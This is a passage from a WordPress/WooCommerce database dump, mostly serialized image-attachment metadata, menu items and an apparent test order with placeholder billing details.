\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1142,503,'_wp_attached_file','2022/01/15.png'),(1143,503,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:527;s:6:\"height\";i:394;s:4:\"file\";s:14:\"2022/01/15.png\";s:8:\"filesize\";i:288997;s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:14:\"15-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:124432;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:14:\"15-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18557;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:12:\"15-50x37.png\";s:5:\"width\";i:50;s:6:\"height\";i:37;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4374;}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"15-300x224.png\";s:5:\"width\";i:300;s:6:\"height\";i:224;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"15-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:14:\"15-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:14:\"15-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:12:\"15-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:12:\"15-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_thumbnail_preview\";a:4:{s:4:\"file\";s:13:\"15-320x64.png\";s:5:\"width\";i:320;s:6:\"height\";i:64;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1144,504,'_wp_attached_file','2022/01/16.png'),(1145,504,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:529;s:6:\"height\";i:400;s:4:\"file\";s:14:\"2022/01/16.png\";s:8:\"filesize\";i:241322;s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:14:\"16-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:104766;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:14:\"16-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:16368;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:12:\"16-50x38.png\";s:5:\"width\";i:50;s:6:\"height\";i:38;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4114;}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"16-300x227.png\";s:5:\"width\";i:300;s:6:\"height\";i:227;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"16-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:14:\"16-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:14:\"16-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:12:\"16-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:12:\"16-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_thumbnail_preview\";a:4:{s:4:\"file\";s:14:\"16-320x384.png\";s:5:\"width\";i:320;s:6:\"height\";i:384;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1146,505,'_wp_attached_file','2022/01/1-02.png'),(1147,505,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:4167;s:6:\"height\";i:4167;s:4:\"file\";s:16:\"2022/01/1-02.png\";s:8:\"filesize\";i:100476;s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:16:\"1-02-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:13860;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:16:\"1-02-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4065;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:14:\"1-02-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1757;}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"1-02-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"1-02-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"1-02-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"1-02-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:18:\"1-02-1536x1536.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:18:\"1-02-2048x2048.png\";s:5:\"width\";i:2048;s:6:\"height\";i:2048;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:16:\"1-02-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:16:\"1-02-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:16:\"1-02-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:14:\"1-02-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:14:\"1-02-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1154,459,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:268;s:6:\"height\";i:30;s:4:\"file\";s:11:\"payment.png\";}}'),(1191,476,'_edit_lock','1643015094:1'),(1192,476,'_edit_last','1'),(1207,521,'_edit_lock','1643605167:1'),(1208,521,'_edit_last','1'),(1702,403,'_edit_lock','1646652001:1'),(1703,403,'_edit_last','1'),(1725,562,'_edit_lock','1643020603:1'),(1726,562,'_edit_last','1'),(1727,564,'_edit_lock','1643020654:1'),(1728,564,'_edit_last','1'),(1729,566,'_edit_lock','1643020685:1'),(1730,566,'_edit_last','1'),(1731,568,'_edit_lock','1643021129:1'),(1732,568,'_edit_last','1'),(1733,570,'_menu_item_type','post_type'),(1734,570,'_menu_item_menu_item_parent','0'),(1735,570,'_menu_item_object_id','568'),(1736,570,'_menu_item_object','page'),(1737,570,'_menu_item_target',''),(1738,570,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1739,570,'_menu_item_xfn',''),(1740,570,'_menu_item_url',''),(1741,571,'_menu_item_type','post_type'),(1742,571,'_menu_item_menu_item_parent','0'),(1743,571,'_menu_item_object_id','566'),(1744,571,'_menu_item_object','page'),(1745,571,'_menu_item_target',''),(1746,571,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1747,571,'_menu_item_xfn',''),(1748,571,'_menu_item_url',''),(1749,572,'_menu_item_type','post_type'),(1750,572,'_menu_item_menu_item_parent','0'),(1751,572,'_menu_item_object_id','564'),(1752,572,'_menu_item_object','page'),(1753,572,'_menu_item_target',''),(1754,572,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1755,572,'_menu_item_xfn',''),(1756,572,'_menu_item_url',''),(1765,574,'_menu_item_type','post_type'),(1766,574,'_menu_item_menu_item_parent','0'),(1767,574,'_menu_item_object_id','562'),(1768,574,'_menu_item_object','page'),(1769,574,'_menu_item_target',''),(1770,574,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1771,574,'_menu_item_xfn',''),(1772,574,'_menu_item_url',''),(1833,580,'_order_key','wc_order_HBkR3Bjro4x3p'),(1834,580,'_customer_user','1'),(1835,580,'_payment_method','razorpay'),(1836,580,'_payment_method_title','Credit Card/Debit Card/NetBanking'),(1837,580,'_customer_ip_address','171.76.108.252'),(1838,580,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36'),(1839,580,'_created_via','checkout'),(1840,580,'_cart_hash','9072f1a13a9536e1f862a3cd6aa0dc86'),(1841,580,'_billing_first_name','aaa'),(1842,580,'_billing_last_name','aaa'),(1843,580,'_billing_address_1','123'),(1844,580,'_billing_city','bangalore'),(1845,580,'_billing_state','KA'),(1846,580,'_billing_postcode','560078'),(1847,580,'_billing_country','IN'),(1848,580,'_billing_email','wp@dxpsites.com'),(1849,580,'_billing_phone','123456'),(1850,580,'_shipping_first_name','aaa'),(1851,580,'_shipping_last_name','aaa'),(1852,580,'_shipping_address_1','123'),(1853,580,'_shipping_city','bangalore'),(1854,580,'_shipping_state','KA'),(1855,580,'_shipping_postcode','560078'),(1856,580,'_shipping_country','IN'),(1857,580,'_order_currency','INR'),(1858,580,'_cart_discount','0'),(1859,580,'_cart_discount_tax','0'),(1860,580,'_order_shipping','0'),(1861,580,'_order_shipping_tax','0'),(1862,580,'_order_tax','0'),(1863,580,'_order_total','220.00'),(1864,580,'_order_version','6.1.1'),(1865,580,'_prices_include_tax','no'),(1866,580,'_billing_address_index','aaa aaa  123  bangalore KA 560078 IN wp@dxpsites.com 123456'),(1867,580,'_shipping_address_index','aaa aaa  123  bangalore KA 560078 IN '),(1868,580,'is_vat_exempt','no'),(1869,580,'has_wcmp_sub_order','1'),(1870,581,'order_items_commission_rates','a:1:{i:3;a:4:{s:4:\"mode\";s:6:\"vendor\";s:4:\"type\";s:7:\"percent\";s:14:\"commission_val\";s:0:\"\";s:16:\"commission_fixed\";i:0;}}'),(1871,581,'_billing_first_name','aaa'),(1872,581,'_billing_last_name','aaa'),(1873,581,'_billing_company',''),(1874,581,'_billing_address_1','123'),(1875,581,'_billing_address_2',''),(1876,581,'_billing_city','bangalore'),(1877,581,'_billing_state','KA'),(1878,581,'_billing_postcode','560078'),(1879,581,'_billing_country','IN'),(1880,581,'_billing_email','wp@dxpsites.com'),(1881,581,'_billing_phone','123456'),(1882,581,'_shipping_first_name','aaa'),(1883,581,'_shipping_last_name','aaa'),(1884,581,'_shipping_company',''),(1885,581,'_shipping_address_1','123'),(1886,581,'_shipping_address_2',''),(1887,581,'_shipping_city','bangalore'),(1888,581,'_shipping_state','KA'),(1889,581,'_shipping_postcode','560078'),(1890,581,'_shipping_country','IN'),(1891,581,'_shipping_phone',''),(1892,581,'_payment_method','razorpay'),(1893,581,'_payment_method_title','Credit Card/Debit Card/NetBanking'),(1894,581,'_customer_user','1'),(1895,581,'_prices_include_tax','no'),(1896,581,'_order_currency','INR'),(1897,581,'_order_key','wc_order_HBkR3Bjro4x3p'),(1898,581,'_customer_ip_address','171.76.108.252'),(1899,581,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36'),(1900,581,'_wcmp_order_version','3.8.7'),(1901,581,'_vendor_id','4'),(1902,581,'_created_via','wcmp_vendor_order'),(1903,581,'_order_total','220.00'),(1904,581,'_order_version','6.1.1'),(1905,581,'_billing_address_index','aaa aaa  123  bangalore KA 560078 IN wp@dxpsites.com 123456'),(1906,581,'_shipping_address_index','aaa aaa  123  bangalore KA 560078 IN '),(1907,581,'_order_shipping','0'),(1908,581,'_order_shipping_tax','0'),(1909,581,'_order_tax','0'),(1910,581,'_cart_discount','0'),(1911,581,'_cart_discount_tax','0'),(1912,582,'_commission_order_id','581'),(1913,582,'_paid_status','unpaid'),(1914,582,'_commission_vendor','34'),(1915,582,'_commission_amount','0'),(1916,582,'_shipping','0'),(1917,582,'_tax','0'),(1918,582,'_commission_total','0'),(1919,581,'_commission_id','582'),(1920,581,'_commissions_processed','yes'),(1921,580,'_transaction_id','pay_Inpqsu4rEEUvsA'),(1922,580,'_date_paid','1643083235'),(1923,580,'_paid_date','2022-01-25 04:00:35'),(1924,580,'_download_permissions_granted','yes'),(1925,580,'_recorded_sales','yes'),(1926,580,'_recorded_coupon_usage_counts','yes'),(1927,580,'_order_stock_reduced','yes'),(1928,580,'_new_order_email_sent','true'),(1929,581,'_date_paid','1643083235'),(1930,581,'_paid_date','2022-01-25 04:00:35'),(1931,581,'_download_permissions_granted','yes'),(1932,581,'_recorded_sales','yes'),(1933,581,'_recorded_coupon_usage_counts','yes'),(1934,581,'_order_stock_reduced','yes'),(1935,580,'wcmp_vendor_order_status_synchronized','1'),(1941,584,'_elementor_edit_mode','builder'),(1942,584,'_elementor_template_type','kit'),(1968,591,'_wp_attached_file','2022/01/home-02.png'),(1969,591,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2926;s:6:\"height\";i:1367;s:4:\"file\";s:19:\"2022/01/home-02.png\";s:8:\"filesize\";i:7311162;s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:19:\"home-02-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:148295;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:19:\"home-02-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:16575;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:17:\"home-02-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2551;}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"home-02-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"home-02-1024x478.png\";s:5:\"width\";i:1024;s:6:\"height\";i:478;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"home-02-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"home-02-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:20:\"home-02-1536x718.png\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:20:\"home-02-2048x957.png\";s:5:\"width\";i:2048;s:6:\"height\";i:957;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:19:\"home-02-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:19:\"home-02-600x280.png\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"home-02-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:17:\"home-02-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:17:\"home-02-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1970,592,'_wp_attached_file','2022/01/11-1.png'),(1971,592,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:516;s:6:\"height\";i:392;s:4:\"file\";s:16:\"2022/01/11-1.png\";s:8:\"filesize\";i:282149;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:16:\"11-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:132419;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:16:\"11-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19472;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:14:\"11-1-50x38.png\";s:5:\"width\";i:50;s:6:\"height\";i:38;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4656;}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"11-1-300x228.png\";s:5:\"width\";i:300;s:6:\"height\";i:228;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"11-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:16:\"11-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:16:\"11-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:14:\"11-1-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:14:\"11-1-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1972,593,'_wp_attached_file','2022/01/11-2.png'),(1973,593,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:516;s:6:\"height\";i:392;s:4:\"file\";s:16:\"2022/01/11-2.png\";s:8:\"filesize\";i:282149;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:16:\"11-2-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:132419;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:16:\"11-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19472;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:14:\"11-2-50x38.png\";s:5:\"width\";i:50;s:6:\"height\";i:38;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4656;}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"11-2-300x228.png\";s:5:\"width\";i:300;s:6:\"height\";i:228;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"11-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:16:\"11-2-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:16:\"11-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:14:\"11-2-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:14:\"11-2-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1974,594,'_wp_attached_file','2022/01/14-1.png'),(1975,594,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:517;s:6:\"height\";i:396;s:4:\"file\";s:16:\"2022/01/14-1.png\";s:8:\"filesize\";i:269864;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:16:\"14-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:119452;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:16:\"14-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18016;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:14:\"14-1-50x38.png\";s:5:\"width\";i:50;s:6:\"height\";i:38;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4551;}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"14-1-300x230.png\";s:5:\"width\";i:300;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"14-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:16:\"14-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:16:\"14-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:14:\"14-1-48x37.png\";s:5:\"width\";i:48;s:6:\"height\";i:37;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:14:\"14-1-48x37.png\";s:5:\"width\";i:48;s:6:\"height\";i:37;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1976,597,'_wp_attached_file','2022/01/11-3.png'),(1977,597,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:516;s:6:\"height\";i:392;s:4:\"file\";s:16:\"2022/01/11-3.png\";s:8:\"filesize\";i:282149;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:16:\"11-3-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:132419;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:16:\"11-3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19472;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:14:\"11-3-50x38.png\";s:5:\"width\";i:50;s:6:\"height\";i:38;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4656;}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"11-3-300x228.png\";s:5:\"width\";i:300;s:6:\"height\";i:228;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"11-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:16:\"11-3-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:16:\"11-3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\